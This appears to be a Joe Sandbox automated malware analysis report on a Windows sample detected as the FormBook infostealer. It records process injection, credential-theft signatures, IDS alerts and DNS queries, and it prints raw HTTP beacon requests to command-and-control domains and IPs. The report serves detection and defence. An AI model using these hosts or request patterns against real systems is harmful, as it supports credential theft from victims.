Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
JJ0tnjLiDS.exe

Overview

General Information

Sample name:JJ0tnjLiDS.exe
renamed because original name is a hash value
Original sample name:7176873d83d97247c18a9037ffa5964f.exe
Analysis ID:1612323
MD5:7176873d83d97247c18a9037ffa5964f
SHA1:0a0a23e6b839f0e588d422b3d376c4658b1978de
SHA256:7c421b3dfe5e73aaffae7fa858d1a1628d6dc09c7eccbcfbb42f027e20c0ac70
Tags:exeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file does not import any functions
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • JJ0tnjLiDS.exe (PID: 6564 cmdline: "C:\Users\user\Desktop\JJ0tnjLiDS.exe" MD5: 7176873D83D97247C18A9037FFA5964F)
    • x6fGRpae78G.exe (PID: 3556 cmdline: "C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\vIQ6QcdyNxOK.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
      • systray.exe (PID: 6408 cmdline: "C:\Windows\SysWOW64\systray.exe" MD5: 28D565BB24D30E5E3DE8AFF6900AF098)
        • x6fGRpae78G.exe (PID: 5512 cmdline: "C:\Program Files (x86)\WuBSXUiDqhwXVLXuBjVdDHjuoywTWCdIwRYzJyyagYVaopgQMPfoCDhSOSVyTFlNpPtVCyVqFMPZKpnm\i6aszNJ9x.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.JJ0tnjLiDS.exe.cd0000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T18:11:57.914229+010028554651A Network Trojan was detected192.168.2.54994113.248.169.4880TCP
              2025-02-11T18:12:21.394595+010028554651A Network Trojan was detected192.168.2.549980188.114.97.380TCP
              2025-02-11T18:12:34.642472+010028554651A Network Trojan was detected192.168.2.54998413.248.169.4880TCP
              2025-02-11T18:12:50.249316+010028554651A Network Trojan was detected192.168.2.549988199.59.243.22880TCP
              2025-02-11T18:13:03.633360+010028554651A Network Trojan was detected192.168.2.549992188.114.96.380TCP
              2025-02-11T18:13:18.135980+010028554651A Network Trojan was detected192.168.2.549996106.54.8.25480TCP
              2025-02-11T18:13:31.404873+010028554651A Network Trojan was detected192.168.2.550000209.74.64.5880TCP
              2025-02-11T18:13:45.791165+010028554651A Network Trojan was detected192.168.2.550004129.226.111.12280TCP
              2025-02-11T18:13:58.948172+010028554651A Network Trojan was detected192.168.2.55000813.248.169.4880TCP
              2025-02-11T18:14:12.132030+010028554651A Network Trojan was detected192.168.2.55001213.248.169.4880TCP
              2025-02-11T18:14:26.176362+010028554651A Network Trojan was detected192.168.2.550016104.214.171.17380TCP
              2025-02-11T18:14:40.276774+010028554651A Network Trojan was detected192.168.2.550020156.224.194.23780TCP
              2025-02-11T18:14:55.069083+010028554651A Network Trojan was detected192.168.2.550024188.114.96.380TCP
              2025-02-11T18:15:09.599852+010028554651A Network Trojan was detected192.168.2.55002813.248.169.4880TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-02-11T18:12:13.791814+010028554641A Network Trojan was detected192.168.2.549977188.114.97.380TCP
              2025-02-11T18:12:16.397000+010028554641A Network Trojan was detected192.168.2.549978188.114.97.380TCP
              2025-02-11T18:12:18.869225+010028554641A Network Trojan was detected192.168.2.549979188.114.97.380TCP
              2025-02-11T18:12:28.016629+010028554641A Network Trojan was detected192.168.2.54998113.248.169.4880TCP
              2025-02-11T18:12:29.511039+010028554641A Network Trojan was detected192.168.2.54998213.248.169.4880TCP
              2025-02-11T18:12:33.141372+010028554641A Network Trojan was detected192.168.2.54998313.248.169.4880TCP
              2025-02-11T18:12:42.604891+010028554641A Network Trojan was detected192.168.2.549985199.59.243.22880TCP
              2025-02-11T18:12:45.124116+010028554641A Network Trojan was detected192.168.2.549986199.59.243.22880TCP
              2025-02-11T18:12:47.676473+010028554641A Network Trojan was detected192.168.2.549987199.59.243.22880TCP
              2025-02-11T18:12:56.032461+010028554641A Network Trojan was detected192.168.2.549989188.114.96.380TCP
              2025-02-11T18:12:58.578870+010028554641A Network Trojan was detected192.168.2.549990188.114.96.380TCP
              2025-02-11T18:13:01.203239+010028554641A Network Trojan was detected192.168.2.549991188.114.96.380TCP
              2025-02-11T18:13:10.441098+010028554641A Network Trojan was detected192.168.2.549993106.54.8.25480TCP
              2025-02-11T18:13:12.981202+010028554641A Network Trojan was detected192.168.2.549994106.54.8.25480TCP
              2025-02-11T18:13:15.565734+010028554641A Network Trojan was detected192.168.2.549995106.54.8.25480TCP
              2025-02-11T18:13:23.750748+010028554641A Network Trojan was detected192.168.2.549997209.74.64.5880TCP
              2025-02-11T18:13:26.303542+010028554641A Network Trojan was detected192.168.2.549998209.74.64.5880TCP
              2025-02-11T18:13:28.859251+010028554641A Network Trojan was detected192.168.2.549999209.74.64.5880TCP
              2025-02-11T18:13:38.133636+010028554641A Network Trojan was detected192.168.2.550001129.226.111.12280TCP
              2025-02-11T18:13:40.684300+010028554641A Network Trojan was detected192.168.2.550002129.226.111.12280TCP
              2025-02-11T18:13:43.228251+010028554641A Network Trojan was detected192.168.2.550003129.226.111.12280TCP
              2025-02-11T18:13:52.361910+010028554641A Network Trojan was detected192.168.2.55000513.248.169.4880TCP
              2025-02-11T18:13:53.841132+010028554641A Network Trojan was detected192.168.2.55000613.248.169.4880TCP
              2025-02-11T18:13:56.407811+010028554641A Network Trojan was detected192.168.2.55000713.248.169.4880TCP
              2025-02-11T18:14:04.438249+010028554641A Network Trojan was detected192.168.2.55000913.248.169.4880TCP
              2025-02-11T18:14:07.023553+010028554641A Network Trojan was detected192.168.2.55001013.248.169.4880TCP
              2025-02-11T18:14:09.613619+010028554641A Network Trojan was detected192.168.2.55001113.248.169.4880TCP
              2025-02-11T18:14:18.519458+010028554641A Network Trojan was detected192.168.2.550013104.214.171.17380TCP
              2025-02-11T18:14:21.061708+010028554641A Network Trojan was detected192.168.2.550014104.214.171.17380TCP
              2025-02-11T18:14:23.610266+010028554641A Network Trojan was detected192.168.2.550015104.214.171.17380TCP
              2025-02-11T18:14:32.475795+010028554641A Network Trojan was detected192.168.2.550017156.224.194.23780TCP
              2025-02-11T18:14:34.996691+010028554641A Network Trojan was detected192.168.2.550018156.224.194.23780TCP
              2025-02-11T18:14:37.553273+010028554641A Network Trojan was detected192.168.2.550019156.224.194.23780TCP
              2025-02-11T18:14:46.196814+010028554641A Network Trojan was detected192.168.2.550021188.114.96.380TCP
              2025-02-11T18:14:48.772266+010028554641A Network Trojan was detected192.168.2.550022188.114.96.380TCP
              2025-02-11T18:14:51.363425+010028554641A Network Trojan was detected192.168.2.550023188.114.96.380TCP
              2025-02-11T18:15:00.581340+010028554641A Network Trojan was detected192.168.2.55002513.248.169.4880TCP
              2025-02-11T18:15:03.144724+010028554641A Network Trojan was detected192.168.2.55002613.248.169.4880TCP
              2025-02-11T18:15:07.000843+010028554641A Network Trojan was detected192.168.2.55002713.248.169.4880TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: JJ0tnjLiDS.exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://www.bjogo.top/zl05/Avira URL Cloud: Label: malware
              Source: http://www.bjogo.top/zl05/?qv=AWdBDJ+GqNUS2XFGJXspkqvu8fMaqBTyvpNObziMfhQkMcZeRNcLYnQ+YBY+SC9LdAZXvp8klsLVctGiAigj2rUf1EKTbgIlvnhcXDfrRl6QUw16w4+KIppI87woBLyMdg==&mdTH1=bxE0iX4XoFeHDAvira URL Cloud: Label: malware
              Multi AV Scanner detection for submitted file
              Source: JJ0tnjLiDS.exeVirustotal: Detection: 61%Perma Link
              Source: JJ0tnjLiDS.exeReversingLabs: Detection: 64%
              Yara detected FormBook
              Source: Yara matchFile source: 0.2.JJ0tnjLiDS.exe.cd0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000004.00000002.4496129166.0000000004EB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472795382.0000000000C80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2472836212.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4498458965.0000000005870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4495153571.0000000003200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000004.00000002.4496072486.0000000004E60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4496171848.00000000030D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2473305146.0000000001470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: JJ0tnjLiDS.exeJoe Sandbox ML: detected
              Source: JJ0tnjLiDS.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: JJ0tnjLiDS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: systray.pdb source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: systray.pdbGCTL source: JJ0tnjLiDS.exe, 00000000.00000003.2441837305.0000000000B9D000.00000004.00000020.00020000.00000000.sdmp, x6fGRpae78G.exe, 00000003.00000002.4495681865.00000000012AE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdbUGP source: JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: JJ0tnjLiDS.exe, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.000000000122E000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000002.2472917406.0000000001090000.00000040.00001000.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2378014479.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp, JJ0tnjLiDS.exe, 00000000.00000003.2379955192.0000000000EDF000.00000004.00000020.00020000.00000000.sdmp, systray.exe, systray.exe, 00000004.00000003.2474650543.0000000005010000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000003.2472850298.0000000004E63000.00000004.00000020.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.00000000051C0000.00000040.00001000.00020000.00000000.sdmp, systray.exe, 00000004.00000002.4496330881.000000000535E000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: x6fGRpae78G.exe, 00000003.00000002.4495152615.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp, x6fGRpae78G.exe, 00000006.00000002.4495151605.0000000000A5F000.00000002.00000001.01000000.00000005.sdmp
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4_2_0321CA20 FindFirstFileW,FindNextFileW,FindClose,4_2_0321CA20
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then xor eax, eax4_2_03209F60
              Source: C:\Windows\SysWOW64\systray.exeCode function: 4x nop then mov ebx, 00000004h4_2_04FA04BF

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49941 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49984 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49982 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49977 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49981 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49985 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49993 -> 106.54.8.254:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50004 -> 129.226.111.122:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49995 -> 106.54.8.254:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49991 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49990 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49994 -> 106.54.8.254:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49992 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50007 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49989 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50010 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49978 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49998 -> 209.74.64.58:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50000 -> 209.74.64.58:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49980 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50008 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49999 -> 209.74.64.58:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49986 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50014 -> 104.214.171.173:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50017 -> 156.224.194.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49983 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50021 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50016 -> 104.214.171.173:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50027 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50011 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49996 -> 106.54.8.254:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50006 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49979 -> 188.114.97.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50020 -> 156.224.194.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50026 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50013 -> 104.214.171.173:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49997 -> 209.74.64.58:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50002 -> 129.226.111.122:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49988 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50012 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50015 -> 104.214.171.173:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50019 -> 156.224.194.237:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50005 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50001 -> 129.226.111.122:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50023 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50028 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50022 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:49987 -> 199.59.243.228:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50009 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:50024 -> 188.114.96.3:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50003 -> 129.226.111.122:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50025 -> 13.248.169.48:80
              Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:50018 -> 156.224.194.237:80
              Performs DNS queries to domains with low reputation
              Source: DNS query: www.zkplant.xyz
              Source: DNS query: www.meacci.xyz
              Source: DNS query: www.limiles.xyz
              Source: DNS query: www.ticquan.xyz
              Source: DNS query: www.nullus.xyz
              Source: DNS query: www.bitcoinvendor.xyz
              Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
              Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /t2z5/?mdTH1=bxE0iX4XoFeHD&qv=8VSe6D3+FdM96toZZUGywJ1DVdRTA+eWswse+lRCZ5nd7JghEm3UTq1Rza0ArSKGlR2SDZuSDjjXV5rchgKJLSqvVnsCaaycbDRjKL0/ooJrL1Hb0aBfmSMKdswh9JhSbw== HTTP/1.1Host: www.zkplant.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /gc4d/?qv=LebFdeUSCMRA/h5tZLycaH7jqAY1vcKCCUGQxkTYOySh8g+yOOCAzgs61Icsq5MKVQ4M10tPO8U+pEslzEpxyKOmXBj1eqfcXSJe7zxRH3B85h1j/tJSgpcu0C0SlXp5Og==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.adventurerepair24.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /ieqn/?qv=TXRwMNvNe7nWWxt3foly+vYqMMoYCv5ex1DbWUgtb2d4F8KnEpYV+vzhvlMsQa+lONHY0YO0NRtIMjRYmzePLVgH7GtSKegHe4K9kT7HvpWQZuKLFIjswIaoNQtKaIPyYQ==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.meacci.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
              Source: global trafficHTTP traffic detected: GET /f0c8/?qv=AHWHpIA83/7LQm5zc0lHPZL2Z5yUztqrVryDOXq41boPuGcZhCFY31qeBhUxRWAvz/oWZxf8/TvWsA/XLj8peYqUpYM4Gw3Jjp9Dwid7Hyhq7fIRl4Ljybjye2cQEtfmHw==&mdTH1=bxE0iX4XoFeHD HTTP/1.1Host: www.sfrouter.expressAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; GT-P5200 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
